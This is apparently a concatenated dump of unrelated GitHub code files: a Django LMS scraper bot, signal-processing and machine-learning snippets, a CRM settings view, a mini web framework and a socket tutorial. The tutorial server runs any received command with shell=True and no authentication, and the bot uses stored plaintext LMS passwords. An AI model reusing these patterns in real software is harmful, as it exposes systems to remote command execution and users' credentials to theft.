term = terms.get(course['term'])\n elif course['term']:\n new_term = Term.objects.create(name=course['term'])\n term = new_term\n terms[course['term']] = new_term\n\n if course_name in courses:\n course_obj = courses.get(course_name)\n else:\n course_obj = Course.objects.create(name=course_name, code=course['id'], term=term)\n courses[course_name] = course_obj\n\n if course['clock'] in clocks:\n clock_obj = clocks.get(course['clock'])\n elif course['clock']:\n new_clock = ClockTime.objects.create(time=course['clock'])\n clock_obj = new_clock\n clocks[course['clock']] = new_clock\n\n if course['days']:\n for day in course['days']:\n if day in days:\n day_obj = days.get(day)\n elif day:\n new_day = Day.objects.create(name=day)\n day_obj = new_day\n days[day] = new_day\n\n course_day_clocktime = CourseDayClockTime.objects.filter(course=course_obj, day=day_obj, clock_time=clock_obj)\n if not course_day_clocktime:\n CourseDayClockTime.objects.create(course=course_obj, day=day_obj, clock_time=clock_obj)\n \n\n if course_obj in user_courses:\n user_course = user_courses.get(course_obj)\n else:\n user_type = user_course_type.get(course['user_course_type'])\n user_course = UserCourse.objects.create(user=user, course=course_obj, user_type=user_type)\n user_courses[course_obj] = user_course\n \n\ndef crawl_teachers_info():\n # login\n session = login(USERNAME, PASSWORD)\n if not session:\n return None\n print(USERNAME, \"login!\")\n print(\"Getting teacher courses...\")\n # Get the user's courses' info link\n dic_course = {}\n courses = Course.objects.all().filter(teacher__isnull=True)\n for course in courses:\n course_name = course.name\n course_id = course.code\n course_info_link = BASE_INFO_LINK + course_id\n dic_course[course_name] = {\"id\": course_id}\n try:\n response = session.get(course_info_link)\n soup = BeautifulSoup(response.text, 'lxml')\n teacher = soup.find(class_=\"teachers\").find('a')\n teacher_name = teacher.text\n teacher_id = teacher['href'].split('id=')[-1].split('&')[0]\n dic_course[course_name]['teacher_name'] = teacher_name\n dic_course[course_name]['teacher_id'] = teacher_id\n except:\n dic_course[course_name]['teacher_name'] = None\n dic_course[course_name]['teacher_id'] = None \n\n return set_courses_teacher(dic_course) \n\n\ndef set_courses_teacher(course_info):\n print(\"Setting teacher courses...\")\n selected_courses = Course.objects.all().filter(teacher__isnull=True)\n courses = {course.name: course for course in selected_courses}\n teachers = {teacher.lms_id: teacher for teacher in Teacher.objects.all()}\n\n for course_name, course in courses.items():\n teacher = None\n curr_course_info = course_info.get(course_name)\n if not curr_course_info:\n continue\n if curr_course_info['teacher_id'] in teachers:\n teacher = teachers.get(curr_course_info['teacher_id'])\n elif curr_course_info['teacher_id']:\n teacher = Teacher.objects.create(name=curr_course_info['teacher_name'], lms_id=curr_course_info['teacher_id'])\n teachers[curr_course_info['teacher_id']] = teacher \n\n course.teacher = teacher\n \n selected_courses.bulk_update(selected_courses, ['teacher'])\n user_course_cube_apply()\n\n\ndef create_main_dirs():\n print(\"Creating main directories...\")\n courses = Course.objects.all()\n for course in courses:\n if not Directory.objects.filter(course=course, parent=None).exists():\n Directory.objects.create(name=course.name, parent=None, course=course)\n\n\ndef apply(chat_id):\n user = User.objects.all().filter(chat_id=chat_id).first()\n departments = {department.name: department for department in Department.objects.all()}\n statuses = {status.name: status for status in UserStatus.objects.all()}\n courses = {course.name: course for course in Course.objects.all()}\n\n session = login(user.lms_username, user.lms_password)\n if not session:\n user.status = statuses.get('wrong')\n user.save()\n print(user.lms_username, \"login failed!\")\n return 'error'\n\n print(user.lms_username, \"login!\")\n print(\"Getting user info...\")\n user_info = crawl_user_info(session, user)\n print(\"Setting user info...\")\n status = set_user_info(user, user_info, departments, statuses)['status']\n if status == 'error':\n return 'wrong'\n\n elif status == 'correct':\n print(\"Getting user courses...\")\n course_info = crawl_course_info(session, user_info['soup'])\n print(\"Setting user courses...\")\n set_user_courses(user, course_info, courses)\n\n create_main_dirs()\n user_course_cube_apply()\n\n return 'correct'\n\n","repo_name":"mhhasani/CE99bot","sub_path":"CE99Bot/BotApp/scripts/CreateNewUser.py","file_name":"CreateNewUser.py","file_ext":"py","file_size_in_byte":10927,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"41573329431","text":"import numpy as np\nimport scipy.fftpack as fftpack\n# import sys\n# import numpy\n# numpy.set_printoptions(threshold=sys.maxsize)\n\n# Temporal bandpass filter with Fast-Fourier Transform\ndef fft_filter(video, freq_min, freq_max, fps):\n print(\"video\",video)\n print(\"video.shape\",video.shape)\n fft = fftpack.fft(video, axis=0)\n print(\"fft.shape\",fft.shape)\n print(\"fft\",fft)\n frequencies = fftpack.fftfreq(video.shape[0], d=1.0 / fps)\n print(\"frequencies\",frequencies)\n bound_low = (np.abs(frequencies - freq_min)).argmin()\n print(\"bound_low\",bound_low)\n bound_high = (np.abs(frequencies - freq_max)).argmin()\n\n print(\"bound_high\", bound_high)\n fft[:bound_low] = 0\n fft[bound_high:-bound_high] = 0\n fft[-bound_low:] = 0\n print(\"fft2\", fft)\n iff = fftpack.ifft(fft, axis=0)\n\n print(\"iff\",iff)\n # file1 = open(\"iffabs.txt\", \"w\")\n # # \\n is placed to indicate EOL (End of Line)\n #\n #\n # print(\"-----------------------------------------------\")\n result = np.abs(iff)\n # file1.writelines(str(data))\n # file1.close() # to change file access modes\n # print(result[0][1][0][0])\n result *= 500 # Amplification factor\n\n return result, fft, frequencies","repo_name":"SijinJohn/HeartRate","sub_path":"Abhishek/eulerian.py","file_name":"eulerian.py","file_ext":"py","file_size_in_byte":1221,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"73581532907","text":"import jwt\nfrom django.contrib.auth.models import User, update_last_login\nfrom django.utils.timezone import now\nfrom test_task.settings import SECRET_KEY\n\nfrom .models import AppUser\n\n\nclass AnalyticsMiddleware:\n def __init__(self, get_response):\n self.get_response = get_response\n\n def __call__(self, request):\n\n response = self.get_response(request)\n if request.path == '/api/auth/jwt/create/':\n if 'access' in response.data:\n token = response.data['access']\n user_id = jwt.decode(token, SECRET_KEY, algorithms=['HS256'])['user_id']\n user = User.objects.get(id=user_id)\n update_last_login(None, user)\n if request.user.is_authenticated:\n AppUser.objects.filter(user_id=request.user.id).update(last_activity=now())\n return response\n","repo_name":"Gumbeat/test_task","sub_path":"test_task/app/middleware.py","file_name":"middleware.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34805324558","text":"import sys\nfrom amico import Amico\n\ntry:\n from setuptools import setup\nexcept ImportError:\n from distutils.core import setup\n\nrequirements = [req.strip() for req in open('requirements.pip')]\n\nsetup(\n name = 'amico',\n version = Amico.VERSION,\n author = 'David Czarnecki',\n author_email = 'dczarnecki@agoragames.com',\n packages = ['amico'],\n install_requires = requirements,\n url = 'https://github.com/agoragames/amico-python',\n license = 'LICENSE.txt',\n description = 'Relationships (e.g. friendships) backed by Redis.',\n long_description = open('README.md').read(),\n keywords = ['python', 'redis', 'friendships'],\n classifiers = [\n 'Development Status :: 5 - Production/Stable',\n 'License :: OSI Approved :: MIT License',\n 'Intended Audience :: Developers',\n 'Operating System :: POSIX',\n 'Topic :: Communications',\n 'Topic :: System :: Distributed Computing',\n 'Topic :: Software Development :: Libraries :: Python Modules',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3',\n 'Topic :: Software Development :: Libraries'\n ]\n)\n","repo_name":"agoragames/amico-python","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"37"} +{"seq_id":"30696814770","text":"import numpy as np\n\n\ndef compute_cost(X, y, theta):\n m = X.shape[0]\n X_ones = np.c_[np.ones((m, 1)), X]\n h_x = X_ones * theta\n difference = np.power(h_x - y, 2)\n sum_ = np.sum(difference)\n cost = 1 / (2 * m) * sum_\n return cost\n\n\ndef gradient_descent(X, y, alpha, iterations):\n m = X.shape[0]\n X_ones = np.c_[np.ones((m, 1)), X]\n n = X_ones.shape[1]\n theta = np.matrix(np.ones(n)).T\n theta[0] = 0\n J_theta = np.matrix(np.zeros(iterations)).T\n\n temp_theta = theta\n for i in range(iterations):\n h_x = X_ones * temp_theta\n difference = np.power(h_x - y, 2)\n sum_ = np.sum(difference)\n J_theta[i] = 1 / (2 * m) * sum_\n temp_theta = temp_theta - alpha * 1 / m * np.dot(X_ones.T, (h_x - y))\n\n return J_theta, temp_theta\n","repo_name":"giezz/Artificial-Intelligence-Methods","sub_path":"labs/lab3/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":797,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6376637745","text":"# -*- coding:utf-8 -*-\n__author__ = 'Qiushi Huang'\n\nimport socket\nimport subprocess\n\n\"\"\"\n需要服务端一直提供服务,\n\"\"\"\nphone = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n# phone.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1) # 启动关闭服务端时,系统端口没有回收,可以重用端口\nphone.bind(('127.0.0.1', 8080))\nphone.listen(5) # 最大挂起的链接数\n\nprint('starting...')\n\nwhile True: # 链接循环\n conn, client_addr = phone.accept()\n print(client_addr)\n\n while True: # 通信循环\n try:\n # 1、收命令\n cmd = conn.recv(1024)\n if not cmd:break # 适用于linux\n\n # 2、执行命令,拿到结果\n obj = subprocess.Popen(cmd.decode('utf-8'), shell=True, # 命令传过来的是bytes格式,按照客户端编码解码\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n\n stdout = obj.stdout.read() # 服务器系统运行结果,Linux 是utf-8\n stderr = obj.stderr.read()\n\n # 3、把命令的结果返回给客户端\n conn.send(stdout+stderr) # 无论对错信息都返回,'+'会生成新的内存空间,效率低\n \"\"\"+是未来需要优化的点\"\"\"\n except ConnectionResetError: # 使用于windows\n break\n\n conn.close()\n\nphone.close()\n\n","repo_name":"hqs2212586/startMyPython3.0","sub_path":"第六章-网络编程/5 简单套接字加上循环/5.4 模拟ssh远程执行命令/服务端.py","file_name":"服务端.py","file_ext":"py","file_size_in_byte":1421,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41091846487","text":"from __future__ import annotations\n\nimport cv2\nimport numpy as np\n\nfrom operator import itemgetter\nfrom typing import List, Optional, Tuple\n\nfrom smg.rigging.helpers import CameraUtil\nfrom smg.utility import DepthImageProcessor, ImageUtil, MonocularDepthEstimator\n\nfrom .mvdepth_multiview_depth_estimator import MVDepthMultiviewDepthEstimator\n\n\nclass MVDepth2MonocularDepthEstimator(MonocularDepthEstimator):\n \"\"\"A monocular depth estimator based on MVDepthNet that triangulates against two different keyframes.\"\"\"\n\n # CONSTRUCTOR\n\n def __init__(self, *, border_to_fill: int = 40, debug: bool = False,\n max_consistent_depth_diff: float = 0.05, max_depth: float = 3.0,\n max_rotation_before_keyframe: float = 5.0, max_rotation_for_triangulation: float = 20.0,\n max_translation_before_keyframe: float = 0.05, min_translation_for_triangulation: float = 0.025):\n \"\"\"\n Construct a monocular depth estimator based on MVDepthNet that triangulates against two different keyframes.\n\n :param border_to_fill: The size of the border (in pixels) of the estimated depth image\n that is to be filled with zeros to help mitigate depth noise.\n :param debug: Whether to show debug visualisations.\n :param max_consistent_depth_diff: The maximum difference there can be between the depths estimated\n for a pixel by the best and second best keyframes for those depths\n to be considered sufficiently consistent.\n :param max_depth: The maximum depth values to keep during post-processing (pixels with\n depth values greater than this will have their depths set to zero).\n :param max_rotation_before_keyframe: The maximum rotation (in degrees) there can be between the current\n look vector and the look vector of the closest keyframe without\n triggering the creation of a new keyframe.\n :param max_rotation_for_triangulation: The maximum rotation (in degrees) there can be between the look\n vector of a keyframe and the current look vector for the keyframe\n to be used.\n :param max_translation_before_keyframe: The maximum translation (in m) there can be between the current\n position and the position of the closest keyframe without\n triggering the creation of a new keyframe.\n :param min_translation_for_triangulation: The minimum translation (in m) there can be between the position\n of a keyframe and the current position for the keyframe to be used.\n \"\"\"\n self.__border_to_fill: int = border_to_fill\n self.__debug: bool = debug\n self.__keyframes: List[Tuple[np.ndarray, np.ndarray]] = []\n self.__max_consistent_depth_diff: float = max_consistent_depth_diff\n self.__max_depth: float = max_depth\n self.__max_rotation_before_keyframe: float = max_rotation_before_keyframe\n self.__max_rotation_for_triangulation: float = max_rotation_for_triangulation\n self.__max_translation_before_keyframe: float = max_translation_before_keyframe\n self.__min_translation_for_triangulation: float = min_translation_for_triangulation\n self.__multiview_depth_estimator: MVDepthMultiviewDepthEstimator = MVDepthMultiviewDepthEstimator()\n\n # PUBLIC METHODS\n\n def estimate_depth(self, colour_image: np.ndarray, tracker_w_t_c: np.ndarray, *, postprocess: bool = False) \\\n -> Optional[np.ndarray]:\n \"\"\"\n Try to estimate a depth image corresponding to the colour image passed in.\n\n .. note::\n If two suitable keyframes cannot be found for triangulation, this will return None.\n\n :param colour_image: The colour image.\n :param tracker_w_t_c: The camera pose corresponding to the colour image (as a camera -> world transform).\n :param postprocess: Whether or not to apply any optional post-processing to the depth image.\n :return: The estimated depth image, if possible, or None otherwise.\n \"\"\"\n result: Optional[Tuple[np.ndarray, np.ndarray]] = self.estimate_depth_full(colour_image, tracker_w_t_c)\n if result is not None:\n estimated_depth_image, depth_diff_image = result\n\n # Filter out any depths that were not sufficiently consistent across both depth estimates.\n estimated_depth_image = np.where(\n depth_diff_image < self.__max_consistent_depth_diff, estimated_depth_image, 0.0\n )\n\n # If we're debugging, show the raw estimated depth image.\n if self.__debug:\n cv2.imshow(\"Raw Estimated Depth Image\", estimated_depth_image / 5)\n cv2.waitKey(1)\n\n # Return the estimated depth image, fully post-processing it in the process if requested,\n # or just limiting the maximum depth as requested otherwise.\n if postprocess:\n return DepthImageProcessor.postprocess_depth_image(\n estimated_depth_image, max_depth=self.__max_depth, max_depth_difference=0.05,\n median_filter_radius=7, min_region_size=20000, min_valid_fraction=0.2\n )\n else:\n return np.where(estimated_depth_image <= self.__max_depth, estimated_depth_image, 0.0)\n else:\n return None\n\n def estimate_depth_full(self, colour_image: np.ndarray, tracker_w_t_c: np.ndarray) \\\n -> Optional[Tuple[np.ndarray, np.ndarray]]:\n \"\"\"\n Try to estimate a depth image corresponding to the colour image passed in.\n\n .. note::\n If two suitable keyframes cannot be found for triangulation, this will return None.\n\n :param colour_image: The colour image.\n :param tracker_w_t_c: The camera pose corresponding to the colour image (as a camera -> world transform).\n :return: If possible, a tuple consisting of the estimated depth image and a depth difference\n image in which each pixel denotes the absolute difference between estimates of the\n depth based on two different keyframes, or None otherwise.\n \"\"\"\n best_depth_image: Optional[np.ndarray] = None\n second_best_depth_image: Optional[np.ndarray] = None\n\n # Compute the translations (in m) and (look) rotations (in degrees) with respect to any existing keyframes.\n translations: List[float] = []\n rotations: List[float] = []\n for _, keyframe_w_t_c in self.__keyframes:\n translations.append(CameraUtil.compute_translation_p(tracker_w_t_c, keyframe_w_t_c))\n rotations.append(CameraUtil.compute_look_rotation_p(tracker_w_t_c, keyframe_w_t_c))\n\n # Score all of the keyframes with respect to the current frame.\n scores: List[(int, float)] = []\n translation_to_closest_keyframe: float = np.inf\n rotation_to_closest_keyframe: float = np.inf\n\n for i in range(len(self.__keyframes)):\n if translations[i] < translation_to_closest_keyframe:\n translation_to_closest_keyframe = translations[i]\n rotation_to_closest_keyframe = rotations[i]\n\n if translations[i] < self.__min_translation_for_triangulation \\\n or rotations[i] > self.__max_rotation_for_triangulation:\n # If the translation's too small, or the rotation's too large, force the score of this keyframe to 0.\n scores.append((i, 0.0))\n else:\n # Otherwise, compute a score loosely based on the one in the Mobile3DRecon paper. Note that we don't\n # use the rotation part of the score, as it produces bad results, and we change the parameters for\n # the translation part of the score (as these parameters empirically seem to work better).\n b_m: float = 0.4\n delta: float = 0.2\n w_b: float = np.exp(-(translations[i] - b_m) ** 2 / delta ** 2)\n scores.append((i, w_b))\n\n # Try to choose up to two keyframes to use together with the current frame to estimate the depth.\n if len(scores) >= 2:\n # Find the two best keyframes, based on their scores.\n # FIXME: There's no need to fully sort the list here.\n # See: https://stackoverflow.com/a/23734295/499449\n # x[np.argpartition(x, range(-2,0))[::-1]\n scores = sorted(scores, key=itemgetter(1), reverse=True)\n best_keyframe_idx, best_keyframe_score = scores[0]\n second_best_keyframe_idx, second_best_keyframe_score = scores[1]\n\n # If both keyframes are fine to use:\n if best_keyframe_score > 0.0 and second_best_keyframe_score > 0.0:\n # Look up the keyframe images and poses.\n best_keyframe_image, best_keyframe_w_t_c = self.__keyframes[best_keyframe_idx]\n second_best_keyframe_image, second_best_keyframe_w_t_c = self.__keyframes[second_best_keyframe_idx]\n\n # Separately estimate a depth image from each keyframe.\n best_depth_image = self.__multiview_depth_estimator.estimate_depth(\n colour_image, best_keyframe_image, tracker_w_t_c, best_keyframe_w_t_c\n )\n second_best_depth_image = self.__multiview_depth_estimator.estimate_depth(\n colour_image, second_best_keyframe_image, tracker_w_t_c, second_best_keyframe_w_t_c\n )\n\n # If we're debugging, show both depth images.\n if self.__debug:\n cv2.imshow(\"Best Depth Image\", best_depth_image / 5)\n cv2.imshow(\"Second Best Depth Image\", second_best_depth_image / 5)\n cv2.waitKey(1)\n\n # Check whether this frame should be a new keyframe. If so, add it to the list.\n if translation_to_closest_keyframe > self.__max_translation_before_keyframe \\\n or rotation_to_closest_keyframe > self.__max_rotation_before_keyframe:\n self.__keyframes.append((colour_image.copy(), tracker_w_t_c.copy()))\n\n # If best and second-best depth images were successfully estimated:\n if best_depth_image is not None:\n # Calculate the average of the two depth images.\n estimated_depth_image: np.ndarray = (best_depth_image + second_best_depth_image) / 2\n\n # Fill the border with zeros (depths around the image border are often quite noisy).\n estimated_depth_image = ImageUtil.fill_border(estimated_depth_image, self.__border_to_fill, 0.0)\n\n # Calculate how inconsistent the depth estimates are for each pixel.\n depth_diff_image: np.ndarray = np.abs(best_depth_image - second_best_depth_image)\n\n # If we're debugging, show the output images.\n if self.__debug:\n cv2.imshow(\"Raw Estimated Depth Image\", estimated_depth_image / 5)\n cv2.imshow(\"Depth Inconsistency Image\", depth_diff_image)\n cv2.waitKey(1)\n\n return estimated_depth_image, depth_diff_image\n else:\n return None\n\n def get_keyframes(self) -> List[Tuple[np.ndarray, np.ndarray]]:\n \"\"\"\n Get the current set of keyframes.\n\n :return: The current set of keyframes.\n \"\"\"\n return self.__keyframes\n\n def set_intrinsics(self, intrinsics: np.ndarray) -> MVDepth2MonocularDepthEstimator:\n \"\"\"\n Set the camera intrinsics.\n\n :param intrinsics: The 3x3 camera intrinsics matrix.\n :return: The current object.\n \"\"\"\n self.__multiview_depth_estimator.set_intrinsics(intrinsics)\n return self\n","repo_name":"sgolodetz/smg-mvdepthnet","sub_path":"smg/mvdepthnet/mvdepth2_monocular_depth_estimator.py","file_name":"mvdepth2_monocular_depth_estimator.py","file_ext":"py","file_size_in_byte":12366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6760438945","text":"from django.shortcuts import render\nfrom django.http import HttpResponse,HttpResponseRedirect\nfrom django.contrib.auth.decorators import login_required\nfrom next_crm.models import ContactFields,ContactTab,DefaultDataFields\nimport json\nfrom django.conf import settings\n\n# Create your views here.\n@login_required(login_url=\"/login/\")\ndef setting(request):\n user_id = request.user.id\n company_id = request.user.profile.company_id\n if request.is_ajax():\n json_response = {'success': False, 'msg':''}\n lst = []\n if 'post_data' in request.POST:\n data = request.POST['post_data']\n dic_data = json.loads(data)\n print(\"dic_data\", dic_data)\n for d in dic_data:\n if d == 'deleted-tabs':\n delete_tab_list = dic_data['deleted-tabs']\n if len(delete_tab_list) > 0:\n for d2 in delete_tab_list:\n delete_tab(d2)\n else:\n tab_field_list = []\n is_default_tab = True if dic_data[d]['is_default'] == 'true' else False\n tab_data_dic = {'id': dic_data[d]['id'],\n 'module_id': 1,\n 'name': dic_data[d]['label'],\n 'fields': tab_field_list,\n 'display_weight': dic_data[d]['position'],\n 'is_default': is_default_tab,\n 'user_id': user_id,\n 'company_id':company_id\n }\n print(\"dd-->\", tab_data_dic)\n if 'tabFields' in dic_data[d]:\n tab_field_list = save_contact_field_data(dic_data[d]['tabFields'],user_id,company_id)\n if 'unused_fields' in dic_data[d]:\n for un in dic_data[d]['unused_fields']:\n if int(un) > 0 and int(un)!=int(501):\n make_default_field_unused(un)\n tab_field_list.append(un)\n if len(tab_field_list) > 0:\n tab_data_dic['fields'] = tab_field_list\n save_contact_tab_data(tab_data_dic)\n json_response['success'] =True\n json_response['msg'] = 'All settings have been saved.'\n\n return HttpResponse(json.dumps(json_response), content_type='application/json')\n\n else:\n data_list =[]\n contact_tabs = ContactTab.objects.all().filter(user_id=request.user.id,company_id=company_id).order_by('display_weight')\n if contact_tabs is not None:\n for o in contact_tabs:\n default_data_fields = ContactFields.objects.all().filter(id__in=o.fields).order_by('display_weight')\n if default_data_fields is not None:\n data_list.append({'name': o.name,\n 'id':o.id,\n 'display_weight':o.display_weight,\n 'is_default': o.is_default,\n 'fields': default_data_fields\n })\n print(default_data_fields)\n else:\n default_data_fields ={}\n labels = {\n 'button_new_field':settings.LABELS['en']['button_new_field'],\n 'text_unused_fields':settings.LABELS['en']['text_unused_fields'],\n 'text_single_line': settings.LABELS['en']['text_single_line'],\n 'text_checkbox': settings.LABELS['en']['text_checkbox'],\n 'text_radio': settings.LABELS['en']['text_radio'],\n 'text_phone': settings.LABELS['en']['text_phone'],\n 'text_multiline': settings.LABELS['en']['text_multiline'],\n 'text_date': settings.LABELS['en']['text_date'],\n 'text_drop_down': settings.LABELS['en']['text_drop_down'],\n 'text_settings': settings.LABELS['en']['text_settings'],\n 'text_contact': settings.LABELS['en']['text_contact'],\n 'text_add_new_tab': settings.LABELS['en']['text_add_new_tab'],\n 'text_save_all': settings.LABELS['en']['text_save_all'],\n 'text_select_option': settings.LABELS['en']['text_select_option'],\n 'text_set_properties': settings.LABELS['en']['text_set_properties'],\n 'text_rename': settings.LABELS['en']['text_rename'],\n 'text_delete': settings.LABELS['en']['text_delete'],\n 'text_drag_info': settings.LABELS['en']['text_drag_info'],\n\n }\n return render(request, 'web/settings/contact_setting.html', {'default_data_fields': data_list,'labels':labels})\n\n\ndef contact_setting_save(request):\n if request.is_ajax():\n json_response = {'success': 'true'}\n return HttpResponse(json.dumps(json_response),content_type='application/json')\n\ndef save_contact_field_data(fields, user_id, company_id):\n counter = 0\n field_lst = []\n for i in fields:\n counter += 1\n options = []\n if i['type'] == 'drop-down' or i['type'] == 'checkbox' or i['type'] == 'radio':\n options = i['options']\n\n if 'id' in i and i['id'] != '0' and i['id'] != 'new':\n object_id = i['id']\n try:\n contact_field = ContactFields.objects.get(pk=object_id)\n contact_field.name = i['label'].replace(\" \", \"-\").lower()\n contact_field.type = i['type']\n contact_field.label = i['label']\n contact_field.is_default = True if i['default'] == 'true' else False\n contact_field.is_required = True if i['is_required'] == 'true' else False\n contact_field.display_weight = counter\n contact_field.display_position = i['direction']\n contact_field.is_unused = False\n\n contact_field.default_values = options\n contact_field.user_id = user_id\n contact_field.company_id = company_id\n contact_field.save()\n #save_default_value(default_data)\n field_lst.append(contact_field.id)\n except ContactFields.DoesNotExist:\n contact_field = ContactFields()\n contact_field.name = i['label'].replace(\" \", \"-\").lower()\n contact_field.type = i['type']\n contact_field.label = i['label']\n contact_field.is_default = True if i['default'] == 'true' else False\n contact_field.is_required = True if i['is_required'] == 'true' else False\n contact_field.display_weight = counter\n contact_field.display_position = i['direction']\n contact_field.is_unused = False\n contact_field.default_values = options\n contact_field.user_id = user_id\n contact_field.company_id = company_id\n contact_field.save()\n field_lst.append(contact_field.id)\n elif i['id'] == 'new':\n contact_field = ContactFields()\n contact_field.name = i['label'].replace(\" \", \"-\").lower()\n contact_field.type = i['type']\n contact_field.label = i['label']\n contact_field.is_default = True if i['default'] == 'true' else False\n contact_field.is_required = True if i['is_required'] == 'true' else False\n contact_field.display_weight = counter\n contact_field.display_position = i['direction']\n contact_field.is_unused = False\n contact_field.default_values = options\n contact_field.user_id = user_id\n contact_field.company_id = company_id\n contact_field.save()\n #save_default_value(default_data)\n field_lst.append(contact_field.id)\n return field_lst\n\n\ndef save_contact_tab_data(tab_data):\n if tab_data['id'] != 'new':\n try:\n contact_tab = ContactTab.objects.get(pk=tab_data['id'])\n contact_tab.module_id = tab_data['module_id']\n contact_tab.name = tab_data['name']\n contact_tab.fields = tab_data['fields']\n contact_tab.display_weight = tab_data['display_weight']\n contact_tab.is_default = tab_data['is_default']\n contact_tab.user_id = tab_data['user_id']\n contact_tab.company_id = tab_data['company_id']\n contact_tab.save()\n except ContactTab.DoesNotExist:\n contact_tab = ContactTab()\n contact_tab.module_id = tab_data['module_id']\n contact_tab.name = tab_data['name']\n contact_tab.fields = tab_data['fields']\n contact_tab.display_weight = tab_data['display_weight']\n contact_tab.is_default = tab_data['is_default']\n contact_tab.user_id = tab_data['user_id']\n contact_tab.company_id = tab_data['company_id']\n contact_tab.save()\n elif tab_data['id']=='new':\n tab_data['is_default']=False\n contact_tab = ContactTab()\n contact_tab.module_id = tab_data['module_id']\n contact_tab.name = tab_data['name']\n contact_tab.fields = tab_data['fields']\n contact_tab.display_weight = tab_data['display_weight']\n contact_tab.is_default = tab_data['is_default']\n contact_tab.user_id = tab_data['user_id']\n contact_tab.company_id = tab_data['company_id']\n contact_tab.save()\n return True\n\n\n\n\ndef delete_tab(tab_id):\n t = ContactTab.objects.get(pk=tab_id)\n if t is not None:\n fields = t.fields\n for i in fields:\n delete_fields(i)\n t.delete()\n\ndef delete_fields(field_id):\n d = ContactFields.objects.get(pk=field_id)\n if d is not None:\n d.delete()\n\ndef make_default_field_unused(field_id):\n contact_field = ContactFields.objects.get(pk=field_id)\n if contact_field is not None:\n contact_field.is_unused = True\n contact_field.save()\n\ndef save_default_value(data):\n print ('test',data)\n","repo_name":"ambre1pravin/django-react","sub_path":"next_crm/views/Settings.py","file_name":"Settings.py","file_ext":"py","file_size_in_byte":10420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14838363615","text":"import re\r\n\r\nfrom frame.ToolBox.ConnectFile import read_config_of_db\r\n\r\n# 连接数据库\r\n_db = read_config_of_db()\r\n\r\n# 配置路由\r\nURL_CONTENT_DICT = dict()\r\n\r\n\r\ndef route(string):\r\n '''\r\n 创建路由功能\r\n :param string: 页面地址\r\n :return: None\r\n '''\r\n def call_func(function):\r\n URL_CONTENT_DICT[string] = function\r\n return call_func\r\n\r\n\r\n@route('/login.html')\r\ndef login():\r\n with open(\"templates/login.html\", encoding='utf-8') as f:\r\n data = f.read()\r\n return data\r\n\r\n\r\n@route('/index.html')\r\ndef index():\r\n with open(\"templates/index.html\", encoding='utf-8') as f:\r\n data = f.read()\r\n\r\n word_content = tuple(_db.select(\"select * from word_table\"))\r\n\r\n html = \"\"\"\"\"\"\r\n for word_info in word_content:\r\n html_templates = \"\"\"\r\n <tr>\r\n <th>{}</th>\r\n <th>{}</th>\r\n \r\n </tr>\r\n <tr>\r\n <th colspan=\"2\">{}</th>\r\n </tr>\r\n \"\"\".format(word_info[1], word_info[2], None)\r\n\r\n html += html_templates\r\n\r\n data = re.sub(r\"\\{%content%\\}\", str(html), data)\r\n return data\r\n\r\n\r\ndef application(env, set_header):\r\n set_header('200 OK', [(\"Content-Type\", \"text/html;charset=utf-8\")])\r\n file_name = env['PATH_INFO']\r\n try:\r\n return URL_CONTENT_DICT[file_name]()\r\n except Exception as e:\r\n return \"content error:{}\".format(e.args)","repo_name":"Bean-jun/englishword","sub_path":"old_dev/frame/mini_frame.py","file_name":"mini_frame.py","file_ext":"py","file_size_in_byte":1434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24651435195","text":"import os, os.path\nos.environ['TF_CPP_MIN_LOG_LEVEL']='2'\nimport numpy as np\nimport cv2\nimport collections\nimport re\nimport sys\nfrom random import shuffle\nfrom random import randint\nfrom numpy import array\nimport random\nexec(open(\"./File_Paths.py\").read())\n\n############################################################################\nrandom.seed(1234)\npositive_label = re.compile(r'^car')\n\n#Do NOT change these\nimage_size = 224\nnum_classes = 2\n\n# Intialize lists and variables\nfile_paths_train = []\nfile_paths_test = []\n\ndef crop_center(img,cropx,cropy,shift):\n y,x,c = img.shape\n x_shift = randint(-shift,shift)\n y_shift = randint(-shift,shift)\n\n startx = x//2 - cropx//2 + x_shift\n starty = y//2 - cropy//2 + y_shift \n return img[starty:starty+cropy, startx:startx+cropx, :]\n\ndef preprocess_input(x):\n x = np.true_divide(x, 255)\n # x /= 255.\n x -= 0.5\n x *= 2.\n return x\n\nfor dir in dirs:\n path_train = dir + 'train/'\n path_test = dir + 'test/'\n\n for root, di, files in os.walk(path_train):\n file_names = [os.path.join(path_train, f) for f in os.listdir(path_train) if os.path.isfile(os.path.join(path_train, f))]\n file_paths_train.extend(file_names)\n\n for root, di, files in os.walk(path_test):\n file_names = [os.path.join(path_test, f) for f in os.listdir(path_test) if os.path.isfile(os.path.join(path_test, f))]\n file_paths_test.extend(file_names)\n\n#Shuffle to randomize training\nshuffle(file_paths_train)\nshuffle(file_paths_test)\n\nfile_paths_train = array(file_paths_train)\nfile_paths_test = array(file_paths_test)\nprint(\"No. of training images: \", len(file_paths_train))\nprint(\"No. of testing images: \", len(file_paths_test))\n\n\n#Read all the training images and labels\nX_train = []\nlabels_train = []\n\nfor aFile in file_paths_train:\n #Image decoding\n input_value = cv2.imread(aFile)\n input_value = preprocess_input(input_value)\n #Get a 224x224 from 256x256 image which is cropped randomly around center\n input_value_crop = np.zeros((image_size, image_size, 3), dtype=np.float32)\n input_value_crop = crop_center(input_value,image_size,image_size, 